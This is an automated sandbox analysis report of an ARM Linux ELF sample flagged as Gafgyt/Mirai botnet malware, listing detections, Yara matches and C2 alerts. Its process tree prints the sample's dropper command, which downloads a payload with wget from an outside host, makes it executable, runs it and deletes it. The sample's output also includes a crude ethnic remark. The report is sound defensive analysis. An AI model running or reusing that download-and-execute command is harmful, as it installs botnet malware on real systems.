Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
armv4l.elf

Overview

General Information

Sample name:armv4l.elf
Analysis ID:1686584
Has dependencies:false
MD5:2e540f8ae41ef4c6b81b7e3f76fb10a4
SHA1:63dbd55249baa1b541f72f3024b1e22d8e72d512
SHA256:8a31d94ac6c21de724e8fb226b77aeeabd2780298850dcadbc05724b643c4ad8
Tags:elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai
Score:92
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Yara detected Mirai
Opens /proc/net/* files useful for finding connected devices and routers
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "wget" command typically used for HTTP/S downloading
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings that are user agent strings indicative of HTTP manipulation
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1686584
Start date and time:2025-05-10 07:47:57 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 9s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:armv4l.elf
Detection:MAL
Classification:mal92.spre.troj.linELF@0/0@6/0
  • VT rate limit hit for: gay.energy
Command:/tmp/armv4l.elf
PID:5509
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate alot
Standard Error:
  • system is lnxubuntu20
  • armv4l.elf (PID: 5509, Parent: 5429, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/armv4l.elf
    • sh (PID: 5511, Parent: 5509, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      • sh New Fork (PID: 5523, Parent: 5511)
      • wget (PID: 5523, Parent: 5511, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q http://gay.energy/.../vivid -O .....
      • sh New Fork (PID: 5524, Parent: 5511)
      • chmod (PID: 5524, Parent: 5511, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 .....
      • sh New Fork (PID: 5525, Parent: 5511)
      • sh (PID: 5525, Parent: 5511, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh ./.....
      • sh New Fork (PID: 5527, Parent: 5511)
      • rm (PID: 5527, Parent: 5511, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf .....
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
armv4l.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    armv4l.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      armv4l.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1573c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x15750:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x15764:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x15778:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1578c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x157a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x157b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x157c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x157dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x157f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x15804:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x15818:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1582c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x15840:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x15854:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x15868:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1587c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x15890:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x158a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x158b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x158cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5514.1.00007f6420017000.00007f6420030000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        5514.1.00007f6420017000.00007f6420030000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x1573c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x15750:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x15764:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x15778:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1578c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x157a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x157b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x157c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x157dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x157f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x15804:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x15818:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1582c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x15840:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x15854:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x15868:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1587c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x15890:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x158a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x158b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x158cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        5509.1.00007f6420017000.00007f6420030000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5509.1.00007f6420017000.00007f6420030000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1573c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x15750:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x15764:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x15778:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1578c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x157a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x157b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x157c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x157dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x157f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x15804:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x15818:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1582c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x15840:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x15854:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x15868:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1587c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x15890:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x158a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x158b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x158cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          5513.1.00007f6420017000.00007f6420030000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            Click to see the 7 entries
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-05-10T07:48:50.662762+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440808TCP
            2025-05-10T07:49:06.217459+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440810TCP
            2025-05-10T07:49:22.058608+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440812TCP
            2025-05-10T07:49:37.628760+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440814TCP
            2025-05-10T07:49:53.188763+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440816TCP
            2025-05-10T07:50:08.750909+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440818TCP
            2025-05-10T07:50:24.312854+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440820TCP
            2025-05-10T07:50:39.871661+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440822TCP
            2025-05-10T07:50:55.432758+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440824TCP
            2025-05-10T07:51:10.991025+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440826TCP
            2025-05-10T07:51:26.552501+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440828TCP
            2025-05-10T07:51:42.111035+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440830TCP
            2025-05-10T07:51:57.666832+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440832TCP
            2025-05-10T07:52:13.225744+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1440834TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: armv4l.elfAvira: detected
            Source: armv4l.elfReversingLabs: Detection: 68%
            Source: armv4l.elfVirustotal: Detection: 63%Perma Link

            Spreading

            barindex
            Source: /tmp/armv4l.elf (PID: 5509)Opens: /proc/net/routeJump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40808
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40832
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40814
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40824
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40816
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40818
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40820
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40828
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40812
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40830
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40826
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40834
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40822
            Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.14:40810
            Source: global trafficTCP traffic: 192.168.2.14:40808 -> 92.60.77.69:666
            Source: /bin/sh (PID: 5523)Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....Jump to behavior
            Source: /usr/bin/wget (PID: 5523)Reads hosts file: /etc/hostsJump to behavior
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
            Source: global trafficDNS traffic detected: DNS query: gay.energy
            Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com

            System Summary

            barindex
            Source: armv4l.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5514.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5509.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5513.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: armv4l.elf PID: 5509, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: armv4l.elf PID: 5513, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: armv4l.elf PID: 5514, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: armv4l.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5514.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5509.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5513.1.00007f6420017000.00007f6420030000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: armv4l.elf PID: 5509, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: armv4l.elf PID: 5513, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: armv4l.elf PID: 5514, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal92.spre.troj.linELF@0/0@6/0
            Source: armv4l.elfELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
            Source: armv4l.elfELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
            Source: armv4l.elfELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
            Source: armv4l.elfELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
            Source: armv4l.elfELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
            Source: armv4l.elfELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
            Source: armv4l.elfELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
            Source: armv4l.elfELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
            Source: armv4l.elfELF static info symbol of initial sample: /home/landley/work/ab7/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm
            Source: armv4l.elfELF static info symbol of initial sample: libc/string/arm/_memcpy.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/string/arm/bcopy.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/string/arm/bzero.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/string/arm/memcpy.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/string/arm/memmove.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/string/arm/memset.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/string/arm/strcmp.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/string/arm/strlen.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/sysdeps/linux/arm/crt1.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/sysdeps/linux/arm/crti.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/sysdeps/linux/arm/crtn.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/sysdeps/linux/arm/sigrestorer.S
            Source: armv4l.elfELF static info symbol of initial sample: libc/sysdeps/linux/arm/vfork.S
            Source: /usr/bin/wget (PID: 5523)File: /tmp/.....Jump to behavior
            Source: /bin/sh (PID: 5525)Directory: /tmp/.....Jump to behavior
